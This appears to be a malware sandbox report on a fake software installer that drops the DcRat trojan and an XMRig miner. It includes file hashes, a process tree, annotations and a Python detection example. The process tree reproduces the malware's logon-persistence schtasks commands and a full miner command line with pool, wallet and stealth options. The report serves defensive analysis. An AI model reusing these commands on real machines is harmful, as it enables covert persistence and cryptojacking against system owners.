Analysis
- max time kernel: 142s
- max time network: 151s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 22-07-2021 22:46

Static task: static1
Behavioral task: behavioral1
- Sample: Software v3.0.5.exe
- Resource: win7v20210410

General
- Target: Software v3.0.5.exe
- Size: 910KB
- MD5: 56d73f0b8c89094a9f0ad6277f042b3d
- SHA1: 6efe8b8257f030fdb63a069aad558b6282310a31
- SHA256: c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
- SHA512: 6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
DcRat 8 IoCs
DarkCrystal RAT (DCRat) is a .NET remote access trojan, active since June 2019, that can load additional plugins.
Processes (resource / yara_rule):
- \Users\Admin\AppData\Roaming\Dcr.exe: dcrat
- C:\Users\Admin\AppData\Roaming\Dcr.exe: dcrat
- C:\Users\Admin\AppData\Roaming\Dcr.exe: dcrat
- \fonthostSvc\fonthostSvcIntodhcp.exe: dcrat
- C:\fonthostSvc\fonthostSvcIntodhcp.exe: dcrat
- C:\fonthostSvc\fonthostSvcIntodhcp.exe: dcrat
- C:\MSOCache\All Users\dwm.exe: dcrat
- C:\MSOCache\All Users\dwm.exe: dcrat
XMRig Miner Payload 3 IoCs
Processes (resource / yara_rule):
- behavioral1/memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp: xmrig
- behavioral1/memory/1492-152-0x00000001402EB66C-mapping.dmp: xmrig
- behavioral1/memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp: xmrig
Executes dropped EXE 9 IoCs
Processes (pid / process):
- 836 Dcr.exe
- 1228 etc.exe
- 1948 xmr.exe
- 576 fonthostSvcIntodhcp.exe
- 1520 dwm.exe
- 1796 services64.exe
- 1932 services32.exe
- 920 sihost64.exe
- 948 sihost32.exe
Loads dropped DLL 8 IoCs
Processes (pid / process):
- 1100 Software v3.0.5.exe (3 hits)
- 340 cmd.exe
- 1948 xmr.exe
- 1228 etc.exe
- 1796 services64.exe
- 1932 services32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes (flow / ioc):
- flow 7: ipinfo.io
- flow 8: ipinfo.io
Drops file in System32 directory 7 IoCs
Processes (description / ioc / process):
- File created: C:\Windows\SysWOW64\KBDROST\ebf1f9fa8afd6d1932bd65bc4cc3af89a4c8e228 (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\System32\C_866\taskhost.exe (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\System32\C_866\b75386f1303e64d8139363b71e44ac16341adf4e (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\System32\wbem\nci\WMIADAP.exe (fonthostSvcIntodhcp.exe)
- File opened for modification: C:\Windows\System32\wbem\nci\WMIADAP.exe (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\System32\wbem\nci\75a57c1bdf437c0c81ad56e81f43c7323ed35745 (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\SysWOW64\KBDROST\cmd.exe (fonthostSvcIntodhcp.exe)
Suspicious use of SetThreadContext 1 IoCs
Processes (description / pid / process / target process):
- PID 1796 set thread context of 1492: services64.exe -> explorer.exe
The target, PID 1492, is the C:\Windows\explorer.exe instance whose command line in the process tree carries XMRig mining options and whose memory dumps match the xmrig rule; this event is the injection step that places the miner inside a legitimately named host process.
Drops file in Windows directory 2 IoCs
Processes (description / ioc / process):
- File created: C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 (fonthostSvcIntodhcp.exe)
- File created: C:\Windows\twain_32\explorer.exe (fonthostSvcIntodhcp.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox attaches its generic "likely ransomware behaviour" note to this signature; nothing else in this trace supports that reading (no mass file modification is recorded), so treat it as drive enumeration by the RAT rather than an encryption stage.
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes (pid / process):
- 1940 schtasks.exe
- 1568 schtasks.exe
- 1456 schtasks.exe
- 1804 schtasks.exe
- 1712 schtasks.exe
- 512 schtasks.exe
- 1424 schtasks.exe
- 1768 schtasks.exe
- 1092 schtasks.exe
- 1580 schtasks.exe
Modifies system certificate store 9 IoCs
Processes (description / ioc / process); all keys are under \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\:
- Key created: B1BC968BD4F49D622AA89A81F2150152A41D829C (services32.exe)
- Key created: DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (services32.exe)
- Set value (data): DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob, not reproduced) (services32.exe)
- Key created: 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (services64.exe)
- Set value (data): 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob, not reproduced) (services64.exe)
- Set value (data): B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob, not reproduced) (services32.exe)
- Set value (data): B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob, not reproduced) (services32.exe)
- Set value (data): 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob, not reproduced) (services64.exe)
- Set value (data): 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (certificate blob, not reproduced) (services64.exe)
AuthRoot\Certificates is where Windows' automatic root-certificate update writes CA certificates it fetches on demand, and the CryptnetUrlCache Content file listed under Downloads has SHA1 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25, the same value as one of these thumbprints. The likeliest reading is that the OS populated these keys when the miner components made their first outbound TLS connection, not that the sample installed a root of its own; confirm by checking the three thumbprints against a known-CA list before treating this as tampering.
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes (pid / process):
- 576 fonthostSvcIntodhcp.exe
- 1520 dwm.exe (2 hits)
- 1948 xmr.exe
- 1228 etc.exe
- 1796 services64.exe
- 1932 services32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes (pid / process):
- 1520 dwm.exe
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes (description / pid / process):
- Token: SeDebugPrivilege 576 fonthostSvcIntodhcp.exe
- Token: SeDebugPrivilege 1520 dwm.exe
- Token: SeDebugPrivilege 1948 xmr.exe
- Token: SeDebugPrivilege 1228 etc.exe
- Token: SeDebugPrivilege 1796 services64.exe
- Token: SeDebugPrivilege 1932 services32.exe
- Token: SeLockMemoryPrivilege 1492 explorer.exe (2 hits)
The droppers and loaders ask for SeDebugPrivilege; the hollowed explorer.exe (PID 1492) instead asks for SeLockMemoryPrivilege, which is the privilege XMRig needs to allocate large pages for RandomX.
Suspicious use of WriteProcessMemory 64 IoCs
Processes (pid process -> target pid target process; repeated writes to the same target collapsed with a count):
- 1100 Software v3.0.5.exe -> 836 Dcr.exe (x4)
- 1100 Software v3.0.5.exe -> 1228 etc.exe (x4)
- 1100 Software v3.0.5.exe -> 1948 xmr.exe (x4)
- 836 Dcr.exe -> 1684 WScript.exe (x4)
- 1684 WScript.exe -> 340 cmd.exe (x4)
- 340 cmd.exe -> 576 fonthostSvcIntodhcp.exe (x4)
- 576 fonthostSvcIntodhcp.exe -> 1768 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1092 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1940 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1580 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1804 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1568 schtasks.exe (x3)
- 576 fonthostSvcIntodhcp.exe -> 1520 dwm.exe (x3)
- 1948 xmr.exe -> 1844 cmd.exe (x3)
- 1228 etc.exe -> 1836 cmd.exe (x3)
- 1844 cmd.exe -> 1712 schtasks.exe (x3)
- 1836 cmd.exe -> 1456 schtasks.exe (x3)
- 1948 xmr.exe -> 1796 services64.exe (x3)
- 1228 etc.exe -> 1932 services32.exe (x3)
- 1932 services32.exe -> 1836 cmd.exe (x1; the listing stops at the 64-IoC cap)
Processes (depth number, image path, PID where the report gives one, command line, triggered signatures)
1 C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe (PID 1100)
  cmd: "C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  2 C:\Users\Admin\AppData\Roaming\Dcr.exe (PID 836)
    cmd: C:\Users\Admin\AppData\Roaming\Dcr.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    3 C:\Windows\SysWOW64\WScript.exe (PID 1684)
      cmd: "C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\SysWOW64\cmd.exe (PID 340)
        cmd: cmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        5 C:\fonthostSvc\fonthostSvcIntodhcp.exe (PID 576)
          cmd: "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
          - Executes dropped EXE
          - Drops file in System32 directory
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\System32\wbem\nci\WMIADAP.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDROST\cmd.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_866\taskhost.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\Windows\system32\schtasks.exe
            cmd: "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          6 C:\MSOCache\All Users\dwm.exe (PID 1520)
            cmd: "C:\MSOCache\All Users\dwm.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: GetForegroundWindowSpam
            - Suspicious use of AdjustPrivilegeToken
  2 C:\Users\Admin\AppData\Roaming\etc.exe (PID 1228)
    cmd: C:\Users\Admin\AppData\Roaming\etc.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    3 C:\Windows\System32\cmd.exe (PID 1836)
      cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\system32\schtasks.exe (PID 1456)
        cmd: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
        - Creates scheduled task(s)
    3 C:\Users\Admin\AppData\Roaming\services32.exe (PID 1932)
      cmd: "C:\Users\Admin\AppData\Roaming\services32.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\System32\cmd.exe (PID 1836)
        cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
        5 C:\Windows\system32\schtasks.exe
          cmd: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
          - Creates scheduled task(s)
      4 C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (PID 948)
        cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        - Executes dropped EXE
  2 C:\Users\Admin\AppData\Roaming\xmr.exe (PID 1948)
    cmd: C:\Users\Admin\AppData\Roaming\xmr.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    3 C:\Windows\System32\cmd.exe (PID 1844)
      cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      - Suspicious use of WriteProcessMemory
      4 C:\Windows\system32\schtasks.exe (PID 1712)
        cmd: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        - Creates scheduled task(s)
    3 C:\Users\Admin\AppData\Roaming\services64.exe (PID 1796)
      cmd: "C:\Users\Admin\AppData\Roaming\services64.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      4 C:\Windows\System32\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5 C:\Windows\system32\schtasks.exe
          cmd: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          - Creates scheduled task(s)
      4 C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (PID 920)
        cmd: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        - Executes dropped EXE
      4 C:\Windows\explorer.exe (PID 1492)
        cmd: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
        - Suspicious use of AdjustPrivilegeToken
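The last node in the tree is the payload: a genuine C:\Windows\explorer.exe image whose command line is an XMRig invocation, started by services64.exe right after the SetThreadContext event recorded against PID 1492. The block below is an added example for this report, not sandbox or XMRig code. It correlates the two facts the way a detection would: pair each SetThreadContext event with the target process's command line, and raise only when that command line parses as a miner, so the alert names the injector (services64.exe) rather than the disguise (explorer.exe). The PIDs, image paths and miner command line are taken from this report; the two-event schema is this example's own assumption. The --cinit-* switches are not options of stock XMRig but of the wrapper that launched it, so they are reported separately as wrapper_flags; the pool on port 80 and the idle-only and stealth flags are exactly the details worth keeping from such a command line.

```python
"""Tie a SetThreadContext event to the miner command line of its target.

Added example for this report, not sandbox or XMRig code. EVENTS is a
constructed sample whose values come from the trace; the field names are
this example's assumption.
"""
import re

MINER_CMDLINE = (
    "C:\\Windows\\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto "
    "--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
    "--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 "
    "--user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ "
    "--pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 "
    "--cinit-stealth"
)

# Constructed events modelled on the report: one injection, one process start.
EVENTS = [
    {"event": "SetThreadContext", "pid": 1796,
     "image": r"C:\Users\Admin\AppData\Roaming\services64.exe",
     "target_pid": 1492, "target_image": r"C:\Windows\explorer.exe"},
    {"event": "ProcessCreate", "pid": 1492,
     "image": r"C:\Windows\explorer.exe", "cmdline": MINER_CMDLINE},
]

# Monero mainnet standard (4...) and subaddress (8...) forms: 95 base58 chars.
MONERO_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def parse_options(cmdline):
    """Map each --flag[=value] after the image path to its value (True if bare)."""
    opts = {}
    for tok in cmdline.split()[1:]:
        if not tok.startswith("-"):
            continue
        key, sep, value = tok.partition("=")
        opts[key] = value if sep else True
    return opts


def miner_profile(opts):
    """Facts an analyst wants from an XMRig-style option set; None if not one."""
    if "--url" not in opts or "--user" not in opts:
        return None
    url = opts["--url"].split("://")[-1]          # drop stratum+tcp:// etc.
    host, sep, port = url.rpartition(":")
    if not sep:
        host, port = url, ""
    threads = opts.get("--cpu-max-threads-hint")
    return {
        "pool_host": host,
        "pool_port": int(port) if port.isdigit() else None,
        "blends_with_web_ports": port in ("80", "443"),
        "wallet": opts["--user"],
        "wallet_is_monero": MONERO_ADDR_RE.match(opts["--user"]) is not None,
        "algo": opts.get("--algo"),
        "cpu_threads_hint": int(threads) if isinstance(threads, str) and threads.isdigit() else None,
        "idle_only": "--cinit-idle-wait" in opts or "--cinit-idle-cpu" in opts,
        "stealth": "--cinit-stealth" in opts,
        "wrapper_flags": sorted(k for k in opts if k.startswith("--cinit-")),
    }


def hollowed_miners(events):
    """Pair each SetThreadContext with its target's command line and keep the
    pairs whose target runs a miner: the injector is the culprit, the target
    image name is only the disguise."""
    created = {e["pid"]: e for e in events if e["event"] == "ProcessCreate"}
    hits = []
    for e in events:
        if e["event"] != "SetThreadContext":
            continue
        target = created.get(e["target_pid"])
        if target is None:
            continue
        profile = miner_profile(parse_options(target["cmdline"]))
        if profile is None:
            continue
        hits.append({"injector": e["image"], "injector_pid": e["pid"],
                     "host_image": target["image"], "host_pid": target["pid"],
                     "miner": profile})
    return hits


if __name__ == "__main__":
    for hit in hollowed_miners(EVENTS):
        print("%s (PID %d) hollowed %s (PID %d)" % (
            hit["injector"], hit["injector_pid"], hit["host_image"], hit["host_pid"]))
        for key, value in sorted(hit["miner"].items()):
            print("    %-22s %s" % (key, value))
```

On the report's events this yields one hit: services64.exe (PID 1796) hollowing explorer.exe (PID 1492), mining rx/0 against pool.hashvault.pro on port 80 with a 95-character Monero address, throttled to a 40% thread hint, idle-only and in stealth mode. For live telemetry the same pairing works on Sysmon event 8/10 (remote thread or process access) joined to event 1 on the target PID; the miner profile is also the right thing to block on, since the wallet and pool survive repacking of the binary.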
Downloads
Several dropped files are byte-identical: etc.exe and services32.exe, xmr.exe and services64.exe, and fonthostSvcIntodhcp.exe and C:\MSOCache\All Users\dwm.exe share every hash, so each stage persists by copying itself to a second path under a system-looking name.
- C:\MSOCache\All Users\dwm.exe
  MD5: 8cf49d252229ed14a26b9a2b45771e1d
  SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  MD5: 2902de11e30dcc620b184e3bb0f0c1cb
  SHA1: 5d11d14a2558801a2688dc2d6dfad39ac294f222
  SHA256: e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
  SHA512: efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
  MD5: d474de575c39b2d39c8583c5c065498a
  SHA1: 5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
  SHA256: 7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
  SHA512: 7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  MD5: 9957b5416f7df4730175f4431e3ec3bb
  SHA1: 46f8a6512ab3b74193b2430bf012de089dbd91ff
  SHA256: 6ff4153467bfa703c0cdb65b6ebfb5579aa152d9ce7ad4617b57ac6bf1d5ba9d
  SHA512: 6db4adb54b62b63b77c146806c0e3bb78154f2fe3ccf36d0b46264dc2b4618c3aa74bd6dc11a942093e05afa9b155a9568da7c9bee07895905c2661ed59c0d1c
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  MD5: 468b7619b5a8af699a133b7ee2c82e23
  SHA1: 2275492369fbd85b98aabeec27a59554c92a2a6d
  SHA256: 26bc1d832eae3c001f348498276a2fd0d1d47b5e0ba0b6e70c5e10635fd0a041
  SHA512: 375dc15875e6eb240732080fe1fdee0423c458019238d0d8f31bd08b8bbef490a5dbca83f2785a5bd7f81487f7cb0a0b054a59476b7b53d120cdc32898223289
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
  MD5: c6285451c9d7d6e7ae818083ccfb9023
  SHA1: f3b7777c9d42665a549c404fcae4b15e0a1603c2
  SHA256: d5a46974275cb760470d73c410956a4bc1edc0ae37e39b3afbd390ae51f2abbb
  SHA512: afff1923bf7d273fd1f06575f0e7d6f53d1f5f07428ad389d50e22af4dd0a1ce0c1b24e89508010386e66a19b61fe4b742f5981b081dc3337635360a3e891f00
- C:\Users\Admin\AppData\Roaming\Dcr.exe
  MD5: 975a0ad02701f9f528784dee5a9728d2
  SHA1: 8a3b57da095dd6fc9d61fe004c1025d929370515
  SHA256: b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
  SHA512: 6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5: 89c453dbd36f561195de8e5c5dce77a0
  SHA1: 8cc44dd7646ec89b6c22214614a8cab158e47f0c
  SHA256: ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
  SHA512: c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
- C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
  MD5: 7059ba6625325156b764224d2b2dbd83
  SHA1: 4cc34def0b7d39b913559f539e6d58a3e363f2e3
  SHA256: 04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
  SHA512: ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
- C:\Users\Admin\AppData\Roaming\etc.exe
  MD5: b07420edcab9bae1bb3fe4befc7ee57c
  SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
- C:\Users\Admin\AppData\Roaming\services32.exe
  MD5: b07420edcab9bae1bb3fe4befc7ee57c
  SHA1: 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256: 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512: 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
- C:\Users\Admin\AppData\Roaming\services64.exe
  MD5: f99c879d74bf1355905734a411191276
  SHA1: 103a41ade035585e4834f7b939e15608fb64d201
  SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
- C:\Users\Admin\AppData\Roaming\xmr.exe
  MD5: f99c879d74bf1355905734a411191276
  SHA1: 103a41ade035585e4834f7b939e15608fb64d201
  SHA256: eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512: e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
- C:\fonthostSvc\5R3FFGftzpp.vbe
  MD5: cb60c41590dc32740e8923ba0cb6df97
  SHA1: aabc007b611df20e79fceee539ef63e7f2754304
  SHA256: c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
  SHA512: a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da
- C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
  MD5: 7245c594f9448bae4a79764fb6897e25
  SHA1: 1eb300765111494f6c7049b5abbbb0e5725b39aa
  SHA256: 4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
  SHA512: 26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8
- C:\fonthostSvc\fonthostSvcIntodhcp.exe
  MD5: 8cf49d252229ed14a26b9a2b45771e1d
  SHA1: d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256: 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512: 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
Memory dumps (pid-sequence-range; mapping dumps carry no size)
- memory/340-82-0x0000000000000000-mapping.dmp
- memory/512-129-0x0000000000000000-mapping.dmp
- memory/576-84-0x0000000000000000-mapping.dmp
- memory/576-87-0x00000000001B0000-0x00000000001B1000-memory.dmp (4KB)
- memory/576-89-0x000000001AE90000-0x000000001AE92000-memory.dmp (8KB)
- memory/804-128-0x0000000000000000-mapping.dmp
- memory/836-62-0x0000000000000000-mapping.dmp
- memory/920-132-0x0000000000000000-mapping.dmp
- memory/920-145-0x000000001BC10000-0x000000001BC12000-memory.dmp (8KB)
- memory/920-135-0x000000013FD90000-0x000000013FD91000-memory.dmp (4KB)
- memory/948-141-0x000000013F930000-0x000000013F931000-memory.dmp (4KB)
- memory/948-137-0x0000000000000000-mapping.dmp
- memory/948-155-0x000000001ACB0000-0x000000001ACB2000-memory.dmp (8KB)
- memory/1092-91-0x0000000000000000-mapping.dmp
- memory/1100-60-0x00000000757D1000-0x00000000757D3000-memory.dmp (8KB)
- memory/1228-70-0x000000013F320000-0x000000013F321000-memory.dmp (4KB)
- memory/1228-65-0x0000000000000000-mapping.dmp
- memory/1228-112-0x0000000002030000-0x0000000002032000-memory.dmp (8KB)
- memory/1228-106-0x0000000000C00000-0x0000000000C06000-memory.dmp (24KB)
- memory/1424-130-0x0000000000000000-mapping.dmp
- memory/1456-110-0x0000000000000000-mapping.dmp
- memory/1492-152-0x00000001402EB66C-mapping.dmp
- memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
- memory/1492-153-0x0000000000270000-0x0000000000290000-memory.dmp (128KB)
- memory/1492-158-0x0000000000680000-0x00000000006A0000-memory.dmp (128KB)
- memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp (7.3MB)
- memory/1492-157-0x00000000003D0000-0x00000000003F0000-memory.dmp (128KB)
- memory/1492-156-0x00000000003D0000-0x00000000003F0000-memory.dmp (128KB)
- memory/1520-104-0x000000001AA10000-0x000000001AA12000-memory.dmp (8KB)
- memory/1520-102-0x0000000000410000-0x0000000000415000-memory.dmp (20KB)
- memory/1520-96-0x0000000000000000-mapping.dmp
